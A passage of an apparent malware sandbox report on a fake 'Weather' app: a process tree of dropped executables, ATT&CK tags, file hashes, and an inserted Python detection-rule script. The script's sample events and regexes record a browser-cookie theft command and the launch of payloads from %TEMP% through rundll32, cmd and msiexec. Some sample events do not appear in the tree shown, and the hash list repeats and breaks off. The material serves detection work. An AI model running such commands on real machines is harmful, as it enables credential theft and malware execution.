    C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0xac,0xb0,0x20c,0x1f0,0x210,0x7ff9ead29ec0,0x7ff9ead29ed0,0x7ff9ead29ee0
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:2
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=2012 /prefetch:8
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=2408 /prefetch:8
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2536 /prefetch:1
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=3160 /prefetch:8
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1992 /prefetch:2
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=2000 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=3456 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=3552 /prefetch:8
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe (depth 5)
    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12098843307284300968,17952775453086869890,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4032_535539371" --mojo-platform-channel-handle=1104 /prefetch:8
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2547.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
- Blocklisted process makes network request
-
C:\Windows\system32\rUNdlL32.eXe (depth 1)
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 448
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4408 -ip 4408
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1884 -ip 1884
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exe (depth 1)
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exe (depth 1)
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7084 -ip 7084
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7084 -ip 7084
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7084 -ip 7084
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\804C.exe (depth 1)
    C:\Users\Admin\AppData\Local\Temp\804C.exe
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8F03.exe (depth 1)
    C:\Users\Admin\AppData\Local\Temp\8F03.exe
-
C:\Users\Admin\AppData\Local\Temp\9A5E.exe (depth 1)
    C:\Users\Admin\AppData\Local\Temp\9A5E.exe
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\A126.exe (depth 1)
    C:\Users\Admin\AppData\Local\Temp\A126.exe
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
    C:\Windows\SysWOW64\WerFault.exe -u -p 3128 -s 296
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3128 -ip 3128
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
    C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
    C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 876
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5452 -ip 5452
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\explorer.exe (depth 1)
    C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
    C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
    C:\Windows\explorer.exe
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
    C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\system32\WerFault.exe (depth 1)
    C:\Windows\system32\WerFault.exe -pss -s 612 -p 1400 -ip 1400
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\explorer.exe (depth 1)
    C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
    C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
    C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
    C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\system32\WerFault.exe (depth 1)
    C:\Windows\system32\WerFault.exe -pss -s 536 -p 4780 -ip 4780
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
    C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5344 -ip 5344
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files\Windows Defender\mpcmdrun.exe (depth 1)
    "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
-
C:\Windows\System32\CompPkgSrv.exe (depth 1)
    C:\Windows\System32\CompPkgSrv.exe -Embedding
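Several patterns in the process tree above are worth encoding as detections rather than reading off by hand: rundll32 pointed at a DLL in %TEMP% (axhub.dll, sqlite.dll), a non-browser binary handed Chrome and Edge Cookies databases on its command line, cmd.exe /k launching an executable from %TEMP%, msiexec silently installing packages from under %APPDATA%, powershell running a script from %TEMP%, and a LOLBin name with mangled case (rUNdlL32.eXe). The Python below is an added example, not part of the sandbox report or any vendor's tooling. Its sample events are (image, command line) pairs transcribed from the tree (the msiexec and powershell lines abridged), plus three ordinary Windows events that must not fire; the rule names, regexes and the choice of what counts as "user-writable" are mine.

```python
"""Heuristic rules over process-creation events like the tree above.

Added example: sample events are transcribed from this report's process tree;
the rules, names and regexes are the author's own, not sandbox output.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str     # executable as recorded by the sandbox
    cmdline: str   # command line as recorded


# Profile locations any unprivileged process can write to (assumption: these two suffice here).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\(local\\temp|roaming)\\", re.I)
# Chromium-family cookie databases (Chrome and Edge, any profile directory).
BROWSER_COOKIE_DB = re.compile(r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\cookies\b", re.I)
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "msiexec.exe", "cmd.exe", "powershell.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def argv0(cmdline):
    """First token of the command line, quoted or not, reduced to its file name."""
    m = re.match(r'"([^"]+)"|(\S+)', cmdline)
    return basename(m.group(1) or m.group(2))


def rule_lolbin_loads_user_dll(e):
    """rundll32 given a DLL that lives in %TEMP%/%APPDATA% (axhub.dll, sqlite.dll above)."""
    if basename(e.image).lower() != "rundll32.exe":   # lower(): rUNdlL32.eXe is the same binary
        return False
    m = re.search(r'"([^"]+\.dll)"|(\S+\.dll)', e.cmdline, re.I)
    return bool(m and USER_WRITABLE.search(m.group(1) or m.group(2)))


def rule_cookie_db_access(e):
    """A process other than the browser itself names a Cookies database on its command line."""
    if basename(e.image).lower() in {"chrome.exe", "msedge.exe"}:
        return False
    return bool(BROWSER_COOKIE_DB.search(e.cmdline))


def rule_silent_msi_from_profile(e):
    """msiexec /i on a package under the user's profile, run with /quiet or /qn."""
    if basename(e.image).lower() != "msiexec.exe":
        return False
    pkg = re.search(r'/i\s+"?([^"]+\.msi)"?', e.cmdline, re.I)
    quiet = re.search(r"(^|\s)/(quiet|qn)(\s|$)", e.cmdline, re.I)
    return bool(pkg and quiet and USER_WRITABLE.search(pkg.group(1)))


def rule_cmd_launches_temp_exe(e):
    """cmd.exe /k or /c wrapping an executable in %TEMP% ('... anyname.exe & exit' above)."""
    if basename(e.image).lower() != "cmd.exe":
        return False
    m = re.search(r'/[kc]\s+"?([^\s"&]+\.exe)', e.cmdline, re.I)
    return bool(m and USER_WRITABLE.search(m.group(1)))


def rule_powershell_script_from_temp(e):
    """powershell.exe handed a .ps1 stored in %TEMP% (AI_2547.ps1 above)."""
    if basename(e.image).lower() != "powershell.exe":
        return False
    m = re.search(r"([A-Za-z]:\\[^\s\"']+\.ps1)", e.cmdline, re.I)
    return bool(m and USER_WRITABLE.search(m.group(1)))


def rule_mixed_case_lolbin(e):
    """A LOLBin invoked with odd casing (rUNdlL32.eXe): weak on its own, but free to check."""
    name = argv0(e.cmdline)
    return name.lower() in LOLBINS and name != name.lower()


RULES = [rule_lolbin_loads_user_dll, rule_cookie_db_access, rule_silent_msi_from_profile,
         rule_cmd_launches_temp_exe, rule_powershell_script_from_temp, rule_mixed_case_lolbin]


def detect(events):
    """(rule name, command line) for every rule that fires on every event."""
    return [(r.__name__, e.cmdline) for e in events for r in RULES if r(e)]


# Transcribed from the tree above (two long lines abridged); the last three are benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\11111.exe",
              r'C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dzu2hcjh.utr\anyname.exe & exit'),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe",
              r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet'),
    ProcEvent(r"C:\Windows\system32\rUNdlL32.eXe",
              r'rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global'),
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2547.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1' -retry_count 10"'''),
    ProcEvent(r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(r"C:\Windows\System32\CompPkgSrv.exe", r"C:\Windows\System32\CompPkgSrv.exe -Embedding"),
    ProcEvent(r"C:\Windows\System32\sihclient.exe", r"C:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.2"),
]

if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{rule:34} {cmd[:90]}")
```

The rules key on the image path and the command line only, because that is all the tree exposes; in production you would add parent image and signer. Lower-casing the image name before comparing is what makes the rundll32 rule fire on both the rUNdlL32.eXe parent and its SysWOW64 child.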
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe
MD5 b89068659ca07ab9b39f1c580a6f9d39
SHA1 7e3e246fcf920d1ada06900889d099784fe06aa5
SHA256 9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512 940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe
MD5 bda0c64936b09cfb76fda98e37f5b6a4
SHA1 8ee82a7dee86562cb7b1732dafe4c5a9f16f51b8
SHA256 4f5a67a18795c134aa846250f5e88b5fafd28f329fd1742d02b141e1095f9783
SHA512 cf1c0d7a5345ad68887a4f6328db54d3119935aad66544e466a002ec9491990da05614c0457c94e7545924b159afc0bc68f350342cc7f7335406c30ba0be362e
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe
MD5 cbafd60beffb18c666ff85f1517a76f9
SHA1 9e015cba7168b610969bfc299a4ffe4763f4fd5f
SHA256 d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d
SHA512 ba61ac5f49827b0fba2c72f4b19540b91f8bceb8b441a713b7de00317059955ad592c88af8f9c94093077503ab3b4c4c522b0e577599ca5020ad1b0f254066ce
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe
MD5 5af9f5b4e531fab8417a2f137350c842
SHA1 644e6ea394ba94830101d4aeb7d9d23c690b0b83
SHA256 a8543cfdbca49e47db17342a882732ae5889601ab06c56927ec1761ba09bfbc4
SHA512 8a0fd77bb8dac23e84e559624c812326184145b7add8ea502c8c11a5c8ba68d5b69878311c41981d75a163ee428e7969e9dd5c4fef955e43913a1e037d4b7b31
-
C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5 5fd2eba6df44d23c9e662763009d7f84
SHA1 43530574f8ac455ae263c70cc99550bc60bfa4f1
SHA256 2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f
SHA512 321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7
-
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5 1c7be730bdc4833afb7117d48c3fd513
SHA1 dc7e38cfe2ae4a117922306aead5a7544af646b8
SHA256 8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1
SHA512 7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e
-
C:\Users\Admin\AppData\Local\Temp\f6cb5833-4ee2-4cc4-8f64-7d953c774a86\@Cryptex777.dll
MD5 e8641f344213ca05d8b5264b5f4e2dee
SHA1 96729e31f9b805800b2248fd22a4b53e226c8309
SHA256 85e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24
SHA512 3130f32c100ecb97083ad8ac4c67863e9ceed3a9b06fc464d1aeeaec389f74c8bf56f4ce04f6450fd2cc0fa861d085101c433cfa4bec3095f8ebeeb53b739109
-
C:\Users\Admin\Documents\1JXoSiUoBQDRFxKQt6PfAJQT.exe
MD5 b5f49db3a9a421773d2eeade6f52bb33
SHA1 08dfa30ef726c80d85e4d803b348a418cf0cadc1
SHA256 5049169b6ddfd46c25ef01b29a760453ac36534b7e033364a297be7efeaa6fc8
SHA512 2078ce819db2f3e6403e2d9f4822dffdd2cd9857cca41cb391c28675265d8e6af9ffc5df00ad4a9fae01628656e4cdf3a1fe02dadd683c6c015bda8ae92066ec
-
C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe
MD5 ff2d2b1250ae2706f6550893e12a25f8
SHA1 5819d925377d38d921f6952add575a6ca19f213b
SHA256 ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96
SHA512 c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23
-
C:\Users\Admin\Documents\6fb0NKLzbR9O1Hnpb8meEjoY.exe
MD5 9499dac59e041d057327078ccada8329
SHA1 707088977b09835d2407f91f4f6dbe4a4c8f2fff
SHA256 ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9
SHA512 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397
-
C:\Users\Admin\Documents\AGV_ZCjRSXUJEYPKIJWOth72.exe
MD5 508d43219e37e4f9828b193e78439635
SHA1 7a23832f84c8a25d52410c22df2472b18f5df47c
SHA256 67a75ff51c68190dc442ff559b946c8db7c1f9dd3073990898c0e9f93d1fed0b
SHA512 aff78b017f0b4d9560cb3f752431ec38ac26860e5098411ebcb7f4ede417e5c139c7af39cd7e997db75a78cc17c865123563247082419da050faa19ee9f68f4e
-
C:\Users\Admin\Documents\K9nJsFAus_AD4WbNTjIG3wOs.exe
MD5 1cd51768a37e5d5027575a38a42eb13c
SHA1 051f84f1062956fc3798456ae475939197d49d43
SHA256 1df977d957e8ae492b1e90d63a0b18b24b7d78fff324a5aa144a01dc4202fe2f
SHA512 9edd5ad91b0840f8603e3d3e0ca61e01a07a441328d4e2126f6d9bdd7b1ad4812b9c4dd5fccdaa943878160bcc05af0fd8aacafce1746f8e2da29d976b203d5d
-
C:\Users\Admin\Documents\KaN6V1t36aPvGbjwrCNT4frv.exe
MD5 77c0247d06673d720c68591e8e16af33
SHA1 0e5c680ef719853fdeb1f363e2c88b7d52c58fc3
SHA256 542d23a12cfa49799370df4d600d17db54c5e8d80335e52439c844bc4d9f2a03
SHA512 c7148a504dcd20bf35a618e17ebb087e6cbaf7282f550a23e6cca9a43be945c4c25a5924c7d1b62c38e301fd26c1dea4e9f050ffc1629d8aa0906c9a70d88f9a
-
C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe
MD5 fa2170ab2dfa330d961cccf8e93c757b
SHA1 d3fd7ae0be7954a547169e29a44d467f14dfb340
SHA256 78f4272d2904fd5539aa41955c99968e0971e167a5d9b42389e9a51ab79cf1b0
SHA512 3880238681560639c153492eaf4a06fc738fed56e6cf3fb64ccd15f47046d04dccae17ff541a5eb32724b7af2a231169dc7c879eea54d2781fbc7429c1bedd4e
-
C:\Users\Admin\Documents\MsKeXpA3JCm5KJWAfbFTLe6p.exe
MD5 a6ef5e293c9422d9a4838178aea19c50
SHA1 93b6d38cc9376fa8710d2df61ae591e449e71b85
SHA256 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0
SHA512 b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454
-
C:\Users\Admin\Documents\OaUqDiJqLrReD6nAIAxVSWA8.exe
MD5 9cfbd2e8f619ce508af7ea851b55f62e
SHA1 c50a46b259d5c5e05972de8eb1ab3bc4195c1a03
SHA256 c188ce667119b9ea8269b2878aaa664e6ba281db957e0354d9eaac8537b8a153
SHA512 c762b9d22cad64cf6addad1d11a7a726a1eacc3bd3ec8d2d1485b25dae637c9238241635707116ee18b4d8e3b5a6600d49f79ed9e10d11ac031fc50a680726fe
-
C:\Users\Admin\Documents\S5JNKYGQ09fmPKqgYZFlX5Wl.exe
MD5 2654d11f2d3ce974e432ad1c84bcd1f7
SHA1 053efdc46790dd1b49e93863df59c83c39342c8f
SHA256 df52242510b70aa54d66b0626624066ece6f8bd5384aa4897778bddfae321c51
SHA512 8b577ed49b7648d67ac7ad19cefdad52eb3665d42561e7b97034607ab1d0e7eb2d0fa22a3338717a2c19e12b9826c338e0f66fcdef3cc9ad6d105c95a0b00df7
-
C:\Users\Admin\Documents\S9vvbu_thmJNivbyrd5cbgjY.exe
MD5 c5cdf4c9d78205655a2592a499b92e8f
SHA1 53d9dc7d0394eafd61c8498a01d9d7abd4f3761c
SHA256 5ec0c20ecf87a05f81cbf45da37943f2f2ebfead783364ff89dd843a2fcde08b
SHA512 980c7bdd901850c87d8848638f648dea06b6fe27d152de6b1204b4634c0f91706111f8ce123288a7cf36a7ef45693652d6566b9aa069de1193e01db7f8b34819
-
C:\Users\Admin\Documents\X6pFteX1hujq71gAoddJIl03.exe
MD5 908fa1446bc3cc61c7f05e0f56067705
SHA1 195948e4b235aa486ffe4f3c22fa5bcea4bb8ea4
SHA256 b2ff33ba5fb21b6ac2d560930be90451eb2197b75c781d162bf321149fe1323f
SHA512 ee616b7b82177086ae749e145837eb895b5a9a1852830bed3f8d38939d4aa3c8b6a383b5be90e957a3fb5e4af298b108a0e7fa0ae1bcd4fe96791e137b0dcce0
-
C:\Users\Admin\Documents\ZM0tOe8uO666xAL03x_SEt7G.exe
MD5 d8b2a0b440b26c2dc3032e3f0de38b72
SHA1 ceca844eba2a784e4fbdac0e9377df9d4b9a668b
SHA256 55da2aa80bd64db9aebd250ce15446ab248255669e64ef3353b7eaae000c6241
SHA512 abc9c8fb1553ab00ed7b628e8810f3e700e07ef9c159eac91bef527531b2c92ac1631d5d81f11c4dfc57687ed2d6b00f6b14195a3024c683d4e27b2d84a75cb3
-
C:\Users\Admin\Documents\ZP8ROxtPgq7xzmkTnY1ILt2W.exe
MD5 e399c741e5809f64dabd7ee219063081
SHA1 411bdea66e7ca6616a13ffcda4c8388472ec4616
SHA256 b9a12e40fe14966bea176d4eb5c96ca19b80982eeb08636711b53bf4fdecfdf1
SHA512 6c99de695f0a98eb49aa866709a945c063a27a8f4c2cdbf9d0c457cfc6074de659779dc187e60a3a3cf50ef5493394a351a49e54f2900428d0937ee68ad1a495
-
C:\Users\Admin\Documents\ZP8ROxtPgq7xzmkTnY1ILt2W.exeMD5
e399c741e5809f64dabd7ee219063081
SHA1411bdea66e7ca6616a13ffcda4c8388472ec4616
SHA256b9a12e40fe14966bea176d4eb5c96ca19b80982eeb08636711b53bf4fdecfdf1
SHA5126c99de695f0a98eb49aa866709a945c063a27a8f4c2cdbf9d0c457cfc6074de659779dc187e60a3a3cf50ef5493394a351a49e54f2900428d0937ee68ad1a495
-
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exeMD5
dcbe7119391038c81bf94f1a446b61ec
SHA1050d68abe0521d67740c560649adbc8a779976ad
SHA256187a72004c93ede992887f5f02371173635383597ede072208017655b441041b
SHA512b10b4d8ef7db62c8e05b65682a31d919279a1dd421120efa159facac8c78ce4644a90fc465f2e4d29b48f471b727e87941493474abe6a0fcdf22ba2998dc5be4
-
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exeMD5
dcbe7119391038c81bf94f1a446b61ec
